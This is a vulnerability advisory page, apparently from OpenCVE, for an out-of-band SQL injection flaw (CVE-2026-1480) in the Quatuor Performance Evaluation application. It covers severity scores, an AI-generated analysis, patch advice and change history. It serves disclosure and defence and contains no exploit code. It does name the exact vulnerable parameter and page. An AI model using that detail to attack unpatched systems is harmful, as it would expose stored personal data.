Description
An out-of-band SQL injection vulnerability (OOB SQLi) has been detected in the Performance Evaluation (EDD) application developed by Gabinete Técnico de Programación. Exploiting this vulnerability in the parameter 'Id_usuario' in '/evaluacion_objetivos_anyo_sig_evalua.aspx', could allow an attacker to extract sensitive information from the database through external channels, without the affected application returning the data directly, compromising the confidentiality of the stored information.
Published: 2026-01-27
Score: 9.3 Critical
EPSS: < 1% Very Low
KEV: No
Impact: Information Disclosure
Action: Update Immediately
AI Analysis

Impact

Out-of-band SQL injection (OOB SQLi) has been identified in the Quatuor Performance Evaluation (EDD) application. The vulnerability is triggered by manipulating the 'Id_usuario' parameter in the '/evaluacion_objetivos_anyo_sig_evalua.aspx' page, allowing an attacker to send malicious SQL queries that are executed against the database. The query results are sent to an external channel rather than being returned directly by the application, enabling the attacker to exfiltrate sensitive data and compromise database confidentiality.

Affected Systems

Systems running older releases of the Quatuor Performance Evaluation (EDD) application are affected. The issue is present in all versions prior to the latest release dated November 12, 2025. The product, developed by Gabinete Técnico de Programación, is used primarily within the Quatuor Evaluación de Desempeño environment.

Risk and Exploitability

The vulnerability carries a CVSS score of 9.3, indicating critical severity, but its EPSS score is below 1% and it is not listed in the CISA KEV catalog, suggesting low exploit probability in the current threat landscape. An attacker can trigger the OOB SQL injection by crafting requests to the exposed parameter without an authenticated session, potentially bypassing authentication barriers. By leveraging external channels, attackers can retrieve confidential data without triggering obvious application errors, making detection more difficult. The combined high severity and low likelihood emphasize the importance of timely patching.

Generated by OpenCVE AI on April 18, 2026 at 02:05 UTC.

Remediation

Vendor Solution

The vulnerabilities have been resolved in the latest version of the application, released on November 12, 2025, and are no longer exploitable.

OpenCVE Recommended Actions

  • Deploy the latest version of the Quatuor Performance Evaluation application, released on November 12, 2025, to remove the out-of-band SQL injection flaw.
  • If an upgrade is not immediately possible, restrict or sanitize all input for the 'Id_usuario' parameter on '/evaluacion_objetivos_anyo_sig_evalua.aspx' to prevent injection attempts.
  • Monitor web traffic and database logs for anomalous OOB query patterns and investigate any suspicious activity promptly.

Generated by OpenCVE AI on April 18, 2026 at 02:05 UTC.

Tracking

Sign in to view the affected projects.

Advisories

No advisories yet.

History

Tue, 10 Feb 2026 20:30:00 +0000

Type Values Removed Values Added
CPEs cpe:2.3:a:quatuor:evaluacion_de_desempeno:-:*:*:*:*:*:*:*
Metrics cvssV3_1

{'score': 7.5, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N'}

Tue, 27 Jan 2026 20:30:00 +0000

Type Values Removed Values Added
First Time appeared Quatuor
Quatuor evaluacion De Desempeno
Vendors & Products Quatuor
Quatuor evaluacion De Desempeno

Tue, 27 Jan 2026 19:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'yes', 'Exploitation': 'none', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Tue, 27 Jan 2026 17:00:00 +0000

Type Values Removed Values Added
Description An out-of-band SQL injection vulnerability (OOB SQLi) has been detected in the Performance Evaluation (EDD) application developed by Gabinete Técnico de Programación. Exploiting this vulnerability in the parameter 'Id_usuario' in '/evaluacion_objetivos_anyo_sig_evalua.aspx', could allow an attacker to extract sensitive information from the database through external channels, without the affected application returning the data directly, compromising the confidentiality of the stored information.
Title Out-of-band SQL injection in Quatuor Performance Evaluation
Weaknesses CWE-89
References
Metrics cvssV4_0

{'score': 9.3, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N'}

Subscriptions

Quatuor Evaluacion De Desempeno
cve-icon MITRE

Status: PUBLISHED

Assigner: INCIBE

Published:

Updated: 2026-01-27T18:51:54.845Z

Reserved: 2026-01-27T09:25:56.882Z

Link: CVE-2026-1480

cve-icon Vulnrichment

Updated: 2026-01-27T18:51:48.905Z

cve-icon NVD

Status : Analyzed

Published: 2026-01-27T17:16:11.550

Modified: 2026-02-10T20:19:24.793

Link: CVE-2026-1480

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-18T02:15:05Z

Weaknesses